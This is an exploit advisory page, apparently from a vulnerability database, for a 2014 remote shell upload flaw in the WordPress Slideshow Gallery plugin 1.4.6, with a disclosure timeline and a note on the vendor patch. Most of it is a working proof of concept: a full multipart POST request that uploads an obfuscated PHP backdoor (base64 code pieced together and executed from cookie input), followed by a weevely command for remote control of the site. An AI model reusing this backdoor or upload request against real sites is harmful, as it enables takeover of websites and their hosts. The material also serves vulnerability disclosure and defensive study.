Vulners
Lucene search
WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability
Summary: WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability.
Found by: Jesus Ramirez Pichardo
@whitexploit
http://whitexploit.blogspot.mx/
Date: 2014-08-28
Vendor Homepage: http://tribulant.com/
Software: Slideshow Gallery
Version: 1.4.6
Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.
Description:
I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default). I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system.
Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).
Proof of Concept (PoC):
1. An attacker uploads a PHP shell file (i.e. backdoor.php):
POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save HTTP/1.1
Host: 192.168.31.128
Connection: keep-alive
Content-Length: 2168
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.31.128
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEGMugMZ1CVkRzbxV DNT: 1
Referer: http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save
Accept-Encoding: gzip,deflate
Accept-Language: es-ES,es;q=0.8,en;q=0.6,it;q=0.4,und;q=0.2
Cookie: wordpress_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C9ee160d2851bbcdaa2865 e9010d92d46; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C0565892d6d7 f9de1022e4ad95b45d4ac; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce; wp- settings-time-1=1409293045
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[id]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[order]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[title]"
Test Shell Upload
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[description]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[showinfo]"
both
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[iopacity]"
70
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[galleries][]"
1
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[type]"
file
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="image_file"; filename="backdoor.php"
Content-Type: application/octet-stream
<?php
$kvgk = str_replace("y","","ysytyry_yreypylyayce"); $dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz"; $asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiR rLic+Jzt9"; $gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSz h"; $fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpe zhyRrPSd";
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
?>
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[image_url]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[uselink]"
N
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[link]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[linktarget]"
self
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="submit"
Save Slide
------WebKitFormBoundaryEGMugMZ1CVkRzbxV--
2. The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
3. The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.
#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit
Now the attacker has a “telnet-like console”. Finally, the attacker has the remote control of the
vulnerable website.
Vulnerability Disclosure Timeline:
2014-08-28: Discovered vulnerability
2014-08-29: Vendor Notification ([email protected])
2014-08-29: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch
2014-08-30: Public Disclosure
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Sep 2014 00:00Current
7.1High risk
Vulners AI Score7.1